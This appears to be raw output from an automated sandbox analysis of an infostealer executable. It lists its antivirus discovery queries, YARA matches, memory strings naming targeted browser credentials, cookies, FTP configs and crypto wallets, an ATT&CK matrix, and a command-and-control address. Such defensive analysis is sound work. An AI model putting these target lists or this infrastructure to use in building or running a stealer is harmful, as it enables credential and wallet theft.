                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Users\user\Desktop\9dOKGgFNL2.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1869047589.000000000678A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 2.2.9dOKGgFNL2.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.9dOKGgFNL2.exe.458a6f0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.9dOKGgFNL2.exe.45a2510.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.9dOKGgFNL2.exe.45a2510.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.9dOKGgFNL2.exe.458a6f0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1741382956.0000000004491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 9dOKGgFNL2.exe PID: 7536, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 9dOKGgFNL2.exe PID: 7712, type: MEMORYSTR
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: [^\u0020-\u007F]ProcessIdname_on_cardencrypted_valuehttps://ipinfo.io/ip%appdata%\logins{0}\FileZilla\recentservers.xml%appdata%\discord\Local Storage\leveldb\tdataAtomicWalletv10/C \EtFile.IOhereuFile.IOm\walFile.IOletsESystem.UItherSystem.UIeumElectrum[AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}profiles\Windows\valueexpiras21ation_moas21nth
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $fq1C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: \Ethereum\wallets
                    Source: 9dOKGgFNL2.exe, 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: user.config{0}\FileZilla\sitemanager.xmlcookies.sqlite\Program Files (x86)\configRoninWalletdisplayNamehost_key\Electrum\walletsName\Exodus\exodus.walletnanjmdknhkinifnkgdcggcfnhdaammmjtdataexpires_utc\Program Data\coMANGOokies.sqMANGOlite*ssfn*ExodusDisplayVersion%localappdata%\GuildWalletOpHandlerenVPHandlerN ConHandlernect%DSK_23%YoroiWalletcmdOpera GXhttps://api.ipify.orgcookies//settinString.Removeg[@name=\PasswString.Removeord\]/valuString.RemoveeSaturnWalletWeb DataSteamPathwaasflleasft.datasfCommandLineSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallCookiesis_secureSoftware\Valve\SteamLogin DataID: isSecureNoDefrdDefVPNDefwaasflletasfMewCxv11\Program Files\Opera GX StableSELECT * FROM Win32_Process Where SessionId='nlbmnnijcnlegkjjpcfjclmcfggfefdmnkddgncdjgjfcddamfgcmfnlhccnimig\coFile.IOm.libeFile.IOrty.jFile.IOaxFile.IOxnamefnjhmkhhmkbjkkabndcnnogagogbneecfhilaheimglignddkjgofkcbgekhenbhProfile_Unknowncard_number_encrypted, Name: AppData\Roaming\TReplaceokReplaceenReplaces.tReplacext //settString.Replaceing[@name=\UString.Replacesername\]/vaString.ReplacelueNWinordVWinpn.eWinxe*Winhostmoz_cookiesUser Datawindows-1251, CommandLine: \ExodusDisplayNameexpiry*.vstring.ReplacedfJaxxpathBSJB
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                    Source: 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $fq5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Jump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\Jump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\Jump to behavior
                    Source: C:\Users\user\Desktop\9dOKGgFNL2.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\Jump to behavior
                    Source: Yara matchFile source: 2.2.9dOKGgFNL2.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.9dOKGgFNL2.exe.458a6f0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.9dOKGgFNL2.exe.45a2510.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.9dOKGgFNL2.exe.45a2510.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.9dOKGgFNL2.exe.458a6f0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1741382956.0000000004491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 9dOKGgFNL2.exe PID: 7536, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 9dOKGgFNL2.exe PID: 7712, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: dump.pcap, type: PCAP
                    Source: Yara matchFile source: 2.2.9dOKGgFNL2.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.9dOKGgFNL2.exe.458a6f0.2.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.9dOKGgFNL2.exe.45a2510.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.9dOKGgFNL2.exe.45a2510.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.9dOKGgFNL2.exe.458a6f0.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1741382956.0000000004491000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1741382956.000000000458A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: 9dOKGgFNL2.exe PID: 7536, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: 9dOKGgFNL2.exe PID: 7712, type: MEMORYSTR
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts221
                    Windows Management Instrumentation
                    1
                    DLL Side-Loading
                    111
                    Process Injection
                    1
                    Masquerading
                    1
                    OS Credential Dumping
                    231
                    Security Software Discovery
                    Remote Services1
                    Archive Collected Data
                    1
                    Encrypted Channel
                    Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    LSASS Memory1
                    Process Discovery
                    Remote Desktop Protocol3
                    Data from Local System
                    11
                    Non-Standard Port
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)241
                    Virtualization/Sandbox Evasion
                    Security Account Manager241
                    Virtualization/Sandbox Evasion
                    SMB/Windows Admin SharesData from Network Shared Drive2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
                    Process Injection
                    NTDS1
                    Application Window Discovery
                    Distributed Component Object ModelInput Capture12
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                    Obfuscated Files or Information
                    LSA Secrets113
                    System Information Discovery
                    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                    Software Packing
                    Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    DLL Side-Loading
                    DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand
                    SourceDetectionScannerLabelLink
                    9dOKGgFNL2.exe67%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                    9dOKGgFNL2.exe62%VirustotalBrowse
                    9dOKGgFNL2.exe100%Joe Sandbox ML
                    No Antivirus matches
                    No Antivirus matches
                    No Antivirus matches
                    SourceDetectionScannerLabelLink
                    http://45.137.22.126:55615/0%Avira URL Cloudsafe
                    http://45.137.22.126:55615t-fq0%Avira URL Cloudsafe
                    http://45.137.22.126:50%Avira URL Cloudsafe
                    45.137.22.126:556150%Avira URL Cloudsafe
                    http://45.137.22.126:556150%Avira URL Cloudsafe
                    45.137.22.126:556153%VirustotalBrowse
                    http://45.137.22.126:55615/3%VirustotalBrowse
                    http://45.137.22.126:52%VirustotalBrowse
                    NameIPActiveMaliciousAntivirus DetectionReputation
                    api.ip.sb
                    unknown
                    unknownfalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      45.137.22.126:55615true
                      • 3%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      http://45.137.22.126:55615/true
                      • 3%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      unknown
                      NameSourceMaliciousAntivirus DetectionReputation
                      https://duckduckgo.com/chrome_newtabtmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.drfalse
                        high
                        http://www.fontbureau.com/designersG9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://duckduckgo.com/ac/?q=tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.drfalse
                            high
                            http://www.fontbureau.com/designers/?9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.founder.com.cn/cn/bThe9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designers?9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://tempuri.org/Endpoint/EnvironmentSettings9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://api.ip.sb/geoip9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/soap/envelope/9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.tiro.com9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://tempuri.org/9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.drfalse
                                                high
                                                http://www.fontbureau.com/designers9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.goodfont.co.kr9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://45.137.22.126:59dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • 2%, Virustotal, Browse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    http://tempuri.org/Endpoint/VerifyUpdateResponse9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://tempuri.org/Endpoint/SetEnvironment9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000003103000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://tempuri.org/Endpoint/SetEnvironmentResponse9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.sajatypeworks.com9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://tempuri.org/Endpoint/GetUpdates9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmp, 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FD7000.00000004.00000800.00020000.00000000.sdmp, 9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002FB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.typography.netD9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.founder.com.cn/cn/cThe9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.galapagosdesign.com/staff/dennis.htm9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://api.ipify.orgcookies//settinString.Removeg9dOKGgFNL2.exe, 9dOKGgFNL2.exe, 00000002.00000002.1857246057.0000000000402000.00000040.00000400.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtmpB5A.tmp.2.dr, tmpB9E.tmp.2.dr, tmpBC1.tmp.2.dr, tmpBD2.tmp.2.dr, tmpBB1.tmp.2.dr, tmpBB0.tmp.2.dr, tmpB8D.tmp.2.dr, tmpB9F.tmp.2.dr, tmpB7D.tmp.2.dr, tmpB7C.tmp.2.dr, tmpB59.tmp.2.dr, tmpB6B.tmp.2.drfalse
                                                                        high
                                                                        http://www.galapagosdesign.com/DPlease9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://tempuri.org/Endpoint/VerifyUpdate9dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://tempuri.org/09dOKGgFNL2.exe, 00000002.00000002.1859206314.0000000002F61000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://www.fonts.com9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.sandoll.co.kr9dOKGgFNL2.exe, 00000000.00000002.1742968092.0000000007612000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
